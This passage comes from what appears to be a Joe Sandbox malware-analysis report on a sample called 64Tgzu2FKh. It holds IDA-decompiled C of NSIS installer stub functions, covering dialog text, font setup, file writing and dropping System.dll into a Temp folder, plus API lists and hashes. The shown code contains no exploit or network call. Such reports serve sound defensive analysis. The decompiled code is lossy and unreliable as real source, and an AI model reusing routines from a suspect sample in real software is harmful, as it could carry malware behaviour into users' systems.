				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageW(_t28, 0x113e, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}

0x00404b88
0x00404b95
0x00404b9b
0x00404bd9
0x00404bd9
0x00404be8
0x00404bef
0x00000000
0x00404bf1
0x00404b9d
0x00404bac
0x00404bb4
0x00404bb7
0x00404bc9
0x00404bcf
0x00404bd6
0x00000000
0x00404bd6
0x00000000

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404B95
GetMessagePos.USER32 ref: 00404B9D
ScreenToClient.USER32(?,?), ref: 00404BB7
SendMessageW.USER32(?,00001111,00000000,?), ref: 00404BC9
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404BEF

Strings

f, xrefs: 00404BCB

Memory Dump Source

Source File: 00000000.00000002.1533003275.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1532965021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533082541.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_64Tgzu2FKh.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
Instruction ID: 6d27a89fd112f7dd13df74400405474d9978eabb633620400ae5318118f47dfb
Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
Instruction Fuzzy Hash: CD015E71900218BADB00DB94DD85FFFBBBCAF95711F10412BBA51B61D0D7B4A9018BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00401DB3 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E00401DB3(intOrPtr __edx) {
				void* __esi;
				int _t9;
				signed char _t15;
				struct HFONT__* _t18;
				intOrPtr _t30;
				struct HDC__* _t31;
				void* _t33;
				void* _t35;

				_t30 = __edx;
				_t31 = GetDC( *(_t35 - 8));
				_t9 = E00402C15(2);
				 *((intOrPtr*)(_t35 - 0x4c)) = _t30;
				0x40cdb0->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t31, 0x5a), 0x48));
				ReleaseDC( *(_t35 - 8), _t31);
				 *0x40cdc0 = E00402C15(3);
				_t15 =  *((intOrPtr*)(_t35 - 0x18));
				 *((intOrPtr*)(_t35 - 0x4c)) = _t30;
				 *0x40cdc7 = 1;
				 *0x40cdc4 = _t15 & 0x00000001;
				 *0x40cdc5 = _t15 & 0x00000002;
				 *0x40cdc6 = _t15 & 0x00000004;
				E0040626E(_t9, _t31, _t33, "Calibri",  *((intOrPtr*)(_t35 - 0x24)));
				_t18 = CreateFontIndirectW(0x40cdb0);
				_push(_t18);
				_push(_t33);
				E00406193();
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}

0x00401db3
0x00401dbe
0x00401dc0
0x00401dcd
0x00401de4
0x00401de9
0x00401df6
0x00401dfb
0x00401dff
0x00401e0a
0x00401e11
0x00401e23
0x00401e29
0x00401e2e
0x00401e38
0x0040258c
0x0040156d
0x00402a65
0x00402ac2
0x00402ace

APIs

GetDC.USER32(?), ref: 00401DB6
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD0
MulDiv.KERNEL32(00000000,00000000), ref: 00401DD8
ReleaseDC.USER32(?,00000000), ref: 00401DE9
CreateFontIndirectW.GDI32(0040CDB0), ref: 00401E38

Strings

Calibri, xrefs: 00401E1E

Memory Dump Source

Source File: 00000000.00000002.1533003275.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1532965021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533082541.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_64Tgzu2FKh.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID: Calibri
API String ID: 3808545654-1409258342
Opcode ID: 32b3ac885727d1e190cdd40c39b4cdf091ab3af3085104150676e708dd364a64
Instruction ID: beb1058faab58ab776b37266111e77616320e0f2a6455f46a6b6c1c153f06785
Opcode Fuzzy Hash: 32b3ac885727d1e190cdd40c39b4cdf091ab3af3085104150676e708dd364a64
Instruction Fuzzy Hash: B6015272558241EFE7006BB0AF8AA9A7FB4AB55301F10497EF241B61E2CA7800458B2D

Uniqueness

Uniqueness Score: -1.00%

Function 00402DD7 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402DD7(struct HWND__* _a4, intOrPtr _a8) {
				short _v132;
				int _t11;
				int _t20;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t20 =  *0x40ce98; // 0x54265
					_t11 =  *0x418ea4; // 0x54269
					if(_t20 >= _t11) {
						_t20 = _t11;
					}
					wsprintfW( &_v132, L"verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
					SetWindowTextW(_a4,  &_v132);
					SetDlgItemTextW(_a4, 0x406,  &_v132);
				}
				return 0;
			}

0x00402de7
0x00402df5
0x00402dfb
0x00402dfb
0x00402e09
0x00402e0b
0x00402e11
0x00402e18
0x00402e1a
0x00402e1a
0x00402e30
0x00402e40
0x00402e52
0x00402e52
0x00402e5a

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402DF5
MulDiv.KERNEL32(00054265,00000064,00054269), ref: 00402E20
wsprintfW.USER32 ref: 00402E30
SetWindowTextW.USER32(?,?), ref: 00402E40
SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E52

Strings

verifying installer: %d%%, xrefs: 00402E2A

Memory Dump Source

Source File: 00000000.00000002.1533003275.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1532965021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533082541.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_64Tgzu2FKh.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: e049c72b028903268a13e0303fe007745629d422319b61ed44a985218b4f833f
Instruction ID: 725db9d4d41e60ee2dd5d311e5346f84fbed97106a71cca60d70b9a4d06edbb5
Opcode Fuzzy Hash: e049c72b028903268a13e0303fe007745629d422319b61ed44a985218b4f833f
Instruction Fuzzy Hash: 73014471640208ABDF209F60DD49FAA3B69EB00708F008039FA05F91D0DBB989558B99

Uniqueness

Uniqueness Score: -1.00%

Function 100024A4 Relevance: 9.1, APIs: 6, Instructions: 98
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E100024A4(intOrPtr* _a4) {
				intOrPtr _v4;
				intOrPtr* _t24;
				void* _t26;
				intOrPtr _t27;
				signed int _t35;
				void* _t39;
				intOrPtr _t40;
				void* _t43;

				_t39 = E1000121B();
				_t24 = _a4;
				_t40 =  *((intOrPtr*)(_t24 + 0x1014));
				_v4 = _t40;
				_t43 = (_t40 + 0x81 << 5) + _t24;
				do {
					if( *((intOrPtr*)(_t43 - 4)) != 0xffffffff) {
					}
					_t35 =  *(_t43 - 8);
					if(_t35 <= 7) {
						switch( *((intOrPtr*)(_t35 * 4 +  &M100025B4))) {
							case 0:
								 *_t39 =  *_t39 & 0x00000000;
								goto L15;
							case 1:
								_push( *__eax);
								goto L13;
							case 2:
								__eax = E10001470(__edx,  *__eax,  *((intOrPtr*)(__eax + 4)), __edi);
								goto L14;
							case 3:
								__ecx =  *0x1000406c;
								__edx = __ecx - 1;
								__eax = MultiByteToWideChar(0, 0,  *__eax, __ecx, __edi, __edx);
								__eax =  *0x1000406c;
								 *(__edi + __eax * 2 - 2) =  *(__edi + __eax * 2 - 2) & 0x00000000;
								goto L15;
							case 4:
								__eax = lstrcpynW(__edi,  *__eax,  *0x1000406c);
								goto L15;
							case 5:
								_push( *0x1000406c);
								_push(__edi);
								_push( *__eax);
								__imp__StringFromGUID2();
								goto L15;
							case 6:
								_push( *__esi);
								L13:
								__eax = wsprintfW(__edi, __ebp);
								L14:
								__esp = __esp + 0xc;
								goto L15;
						}
					}
					L15:
					_t26 =  *(_t43 + 0x14);
					if(_t26 != 0 && ( *_a4 != 2 ||  *((intOrPtr*)(_t43 - 4)) > 0)) {
						GlobalFree(_t26);
					}
					_t27 =  *((intOrPtr*)(_t43 + 0xc));
					if(_t27 != 0) {
						if(_t27 != 0xffffffff) {
							if(_t27 > 0) {
								E100012E1(_t27 - 1, _t39);
								goto L24;
							}
						} else {
							E10001272(_t39);
							L24:
						}
					}
					_v4 = _v4 - 1;
					_t43 = _t43 - 0x20;
				} while (_v4 >= 0);
				return GlobalFree(_t39);
			}

0x100024ae
0x100024b0
0x100024bf
0x100024c5
0x100024d2
0x100024d4
0x100024d8
0x100024d8
0x100024e0
0x100024e6
0x100024e8
0x00000000
0x100024ef
0x00000000
0x00000000
0x100024f5
0x00000000
0x00000000
0x100024ff
0x00000000
0x00000000
0x10002506
0x1000250c
0x10002518
0x1000251e
0x10002523
0x00000000
0x00000000
0x10002545
0x00000000
0x00000000
0x1000252b
0x10002531
0x10002532
0x10002534
0x00000000
0x00000000
0x1000254d
0x1000254f
0x10002551
0x10002553
0x10002553
0x00000000
0x00000000
0x100024e8
0x10002556
0x10002556
0x1000255b
0x1000256d
0x1000256d
0x10002573
0x10002578
0x1000257d
0x10002589
0x1000258e
0x00000000
0x10002593
0x1000257f
0x10002580
0x10002594
0x10002594
0x1000257d
0x10002595
0x10002599
0x1000259c
0x100025b3

APIs

Part of subcall function 1000121B: GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225

GlobalFree.KERNEL32(?), ref: 1000256D
GlobalFree.KERNEL32(00000000), ref: 100025A8

Memory Dump Source

Source File: 00000000.00000002.1615522469.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1615494568.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1615549663.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1615572232.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_64Tgzu2FKh.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: e72053471c67904cbc9fe51406c75cdd0d1e7ae72e07fb5691a107031e3f1593
Instruction ID: 149f0ffe7112dafd64944f245e56057b96fa329c468151baa91e3d773918aa42
Opcode Fuzzy Hash: e72053471c67904cbc9fe51406c75cdd0d1e7ae72e07fb5691a107031e3f1593
Instruction Fuzzy Hash: 1031AF71504651EFF721CF14CCA8E2B7BB8FB853D2F114119F940961A8C7719851DB69

Uniqueness

Uniqueness Score: -1.00%

Function 004028A7 Relevance: 9.1, APIs: 6, Instructions: 86
memoryfileCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E004028A7(void* __ebx) {
				void* _t26;
				long _t31;
				void* _t45;
				void* _t49;
				void* _t51;
				void* _t54;
				void* _t55;
				void* _t56;

				_t45 = __ebx;
				 *((intOrPtr*)(_t56 - 0x30)) = 0xfffffd66;
				_t50 = E00402C37(0xfffffff0);
				 *(_t56 - 0x38) = _t23;
				if(E00405B94(_t50) == 0) {
					E00402C37(0xffffffed);
				}
				E00405D19(_t50);
				_t26 = E00405D3E(_t50, 0x40000000, 2);
				 *(_t56 + 8) = _t26;
				if(_t26 != 0xffffffff) {
					_t31 =  *0x42a218;
					 *(_t56 - 0x3c) = _t31;
					_t49 = GlobalAlloc(0x40, _t31);
					if(_t49 != _t45) {
						E004032F5(_t45);
						E004032DF(_t49,  *(_t56 - 0x3c));
						_t54 = GlobalAlloc(0x40,  *(_t56 - 0x20));
						 *(_t56 - 0x4c) = _t54;
						if(_t54 != _t45) {
							_push( *(_t56 - 0x20));
							_push(_t54);
							_push(_t45);
							_push( *((intOrPtr*)(_t56 - 0x24)));
							E004030FA();
							while( *_t54 != _t45) {
								_t47 =  *_t54;
								_t55 = _t54 + 8;
								 *(_t56 - 0x34) =  *_t54;
								E00405CF9( *((intOrPtr*)(_t54 + 4)) + _t49, _t55, _t47);
								_t54 = _t55 +  *(_t56 - 0x34);
							}
							GlobalFree( *(_t56 - 0x4c));
						}
						E00405DF0( *(_t56 + 8), _t49,  *(_t56 - 0x3c));
						GlobalFree(_t49);
						_push(_t45);
						_push(_t45);
						_push( *(_t56 + 8));
						_push(0xffffffff);
						 *((intOrPtr*)(_t56 - 0x30)) = E004030FA();
					}
					CloseHandle( *(_t56 + 8));
				}
				_t51 = 0xfffffff3;
				if( *((intOrPtr*)(_t56 - 0x30)) < _t45) {
					_t51 = 0xffffffef;
					DeleteFileW( *(_t56 - 0x38));
					 *((intOrPtr*)(_t56 - 4)) = 1;
				}
				_push(_t51);
				E00401423();
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t56 - 4));
				return 0;
			}

0x004028a7
0x004028a9
0x004028b5
0x004028b8
0x004028c2
0x004028c6
0x004028c6
0x004028cc
0x004028d9
0x004028e1
0x004028e4
0x004028ea
0x004028f8
0x004028fd
0x00402901
0x00402904
0x0040290d
0x00402919
0x0040291d
0x00402920
0x00402922
0x00402925
0x00402926
0x00402927
0x0040292a
0x00402949
0x00402931
0x00402936
0x0040293e
0x00402941
0x00402946
0x00402946
0x00402950
0x00402950
0x0040295d
0x00402963
0x00402969
0x0040296a
0x0040296b
0x0040296e
0x00402975
0x00402975
0x0040297b
0x0040297b
0x00402986
0x00402987
0x0040298b
0x0040298f
0x00402995
0x00402995
0x0040299c
0x00402245
0x00402ac2
0x00402ace

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 004028FB
GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 00402917
GlobalFree.KERNEL32(?), ref: 00402950
GlobalFree.KERNEL32(00000000), ref: 00402963
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 0040297B
DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 0040298F

Memory Dump Source

Source File: 00000000.00000002.1533003275.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1532965021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533082541.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_64Tgzu2FKh.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: 794126d87b7ab7f3e2e070d8386bcb8afdde5fae5b7e809f26f6fd9fec4836ff
Instruction ID: c6e800f027f1e1b1e461e4fc783814b3910171fe2b09394c7840a14eb176b3fb
Opcode Fuzzy Hash: 794126d87b7ab7f3e2e070d8386bcb8afdde5fae5b7e809f26f6fd9fec4836ff
Instruction Fuzzy Hash: 9821BFB1D00124BBDF206FA5DE49D9E7E79EF08364F10423AF954762E1CB794C419B98

Uniqueness

Uniqueness Score: -1.00%

Function 00404A6C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84
stringCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00404A6C(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v68;
				char _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t23;
				signed int _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t44;
				signed int _t46;
				signed int _t50;
				signed int _t52;
				signed int _t53;
				signed int _t55;

				_t23 = _a16;
				_t53 = _a12;
				_t44 = 0xffffffdc;
				if(_t23 == 0) {
					_push(0x14);
					_pop(0);
					_t24 = _t53;
					if(_t53 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t44 = 0xffffffdd;
					}
					if(_t53 < 0x400) {
						_t44 = 0xffffffde;
					}
					if(_t53 < 0xffff3333) {
						_t52 = 0x14;
						asm("cdq");
						_t24 = 1 / _t52 + _t53;
					}
					_t25 = _t24 & 0x00ffffff;
					_t55 = _t24 >> 0;
					_t46 = 0xa;
					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
				} else {
					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
					_t50 = 0;
				}
				_t31 = E0040626E(_t44, _t50, _t55,  &_v68, 0xffffffdf);
				_t33 = E0040626E(_t44, _t50, _t55,  &_v132, _t44);
				_t34 = E0040626E(_t44, _t50, 0x4236e8, 0x4236e8, _a8);
				wsprintfW(_t34 + lstrlenW(0x4236e8) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
				return SetDlgItemTextW( *0x4291d8, _a4, 0x4236e8);
			}

0x00404a75
0x00404a7a
0x00404a82
0x00404a83
0x00404a90
0x00404a98
0x00404a99
0x00404a9b
0x00404a9d
0x00404a9f
0x00404aa2
0x00404aa2
0x00404aa9
0x00404aaf
0x00404aaf
0x00404ab6
0x00404abd
0x00404ac0
0x00404ac3
0x00404ac3
0x00404ac7
0x00404ad7
0x00404ad9
0x00404adc
0x00404a85
0x00404a85
0x00404a8c
0x00404a8c
0x00404ae4
0x00404aef
0x00404b05
0x00404b16
0x00404b32

APIs

lstrlenW.KERNEL32(004236E8,004236E8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B0D
wsprintfW.USER32 ref: 00404B16
SetDlgItemTextW.USER32(?,004236E8), ref: 00404B29

Strings

%u.%u%s%s, xrefs: 00404AF7
6B, xrefs: 00404AFF

Memory Dump Source

Source File: 00000000.00000002.1533003275.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1532965021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533082541.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_64Tgzu2FKh.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s$6B
API String ID: 3540041739-3884863406
Opcode ID: 95c3251a73d665659f4e5ef41dc4b3ed63ce9024b19b633afc4b02d7477ffd45
Instruction ID: 5e68f5a3766037a7274f1f000e531c578f4d2f2b22a3e42eca2e55653584bdbe
Opcode Fuzzy Hash: 95c3251a73d665659f4e5ef41dc4b3ed63ce9024b19b633afc4b02d7477ffd45
Instruction Fuzzy Hash: F111D8736481283BDB00656D9C45E9F329CDB81374F150237FE66F61D1D9788C2186EC

Uniqueness

Uniqueness Score: -1.00%

Function 00402592 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 69
stringCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E00402592(int __ebx, void* __edx, intOrPtr* __esi) {
				signed int _t14;
				int _t17;
				int _t24;
				signed int _t29;
				intOrPtr* _t32;
				void* _t34;
				void* _t35;
				void* _t38;
				signed int _t40;

				_t32 = __esi;
				_t24 = __ebx;
				_t14 =  *(_t35 - 0x20);
				_t38 = __edx - 0x38;
				 *(_t35 - 0x4c) = _t14;
				_t27 = 0 | _t38 == 0x00000000;
				_t29 = _t38 == 0;
				if(_t14 == __ebx) {
					if(__edx != 0x38) {
						_t17 = lstrlenW(E00402C37(0x11)) + _t16;
					} else {
						E00402C37(0x21);
						WideCharToMultiByte(__ebx, __ebx, "C:\Users\Arthur\AppData\Local\Temp\nseEF5D.tmp", 0xffffffff, "C:\Users\Arthur\AppData\Local\Temp\nseEF5D.tmp\System.dll", 0x400, __ebx, __ebx);
						_t17 = lstrlenA("C:\Users\Arthur\AppData\Local\Temp\nseEF5D.tmp\System.dll");
					}
				} else {
					E00402C15(1);
					 *0x40ada8 = __ax;
					 *((intOrPtr*)(__ebp - 0x3c)) = __edx;
				}
				 *(_t35 + 8) = _t17;
				if( *_t32 == _t24) {
					L13:
					 *((intOrPtr*)(_t35 - 4)) = 1;
				} else {
					_t34 = E004061AC(_t27, _t32);
					if((_t29 |  *(_t35 - 0x4c)) != 0 ||  *((intOrPtr*)(_t35 - 0x1c)) == _t24 || E00405E1F(_t34, _t34) >= 0) {
						_t14 = E00405DF0(_t34, "C:\Users\Arthur\AppData\Local\Temp\nseEF5D.tmp\System.dll",  *(_t35 + 8));
						_t40 = _t14;
						if(_t40 == 0) {
							goto L13;
						}
					} else {
						goto L13;
					}
				}
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}

0x00402592
0x00402592
0x00402592
0x00402597
0x0040259a
0x0040259d
0x004025a2
0x004025a4
0x004025c4
0x00402602
0x004025c6
0x004025c8
0x004025e2
0x004025ed
0x004025ed
0x004025a6
0x004025a8
0x004025ad
0x004025bb
0x004025be
0x00402607
0x0040260a
0x00402885
0x00402885
0x00402610
0x00402619
0x0040261b
0x0040263a
0x004015b4
0x004015b6
0x00000000
0x004015bc
0x00000000
0x00000000
0x00000000
0x0040261b
0x00402ac2
0x00402ace

APIs

WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nseEF5D.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nseEF5D.tmp\System.dll,00000400,?,?,00000021), ref: 004025E2
lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nseEF5D.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nseEF5D.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nseEF5D.tmp\System.dll,00000400,?,?,00000021), ref: 004025ED

Strings

C:\Users\user\AppData\Local\Temp\nseEF5D.tmp, xrefs: 004025DB
C:\Users\user\AppData\Local\Temp\nseEF5D.tmp\System.dll, xrefs: 004025AD, 004025D4, 004025E8, 00402634

Memory Dump Source

Source File: 00000000.00000002.1533003275.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1532965021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533082541.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
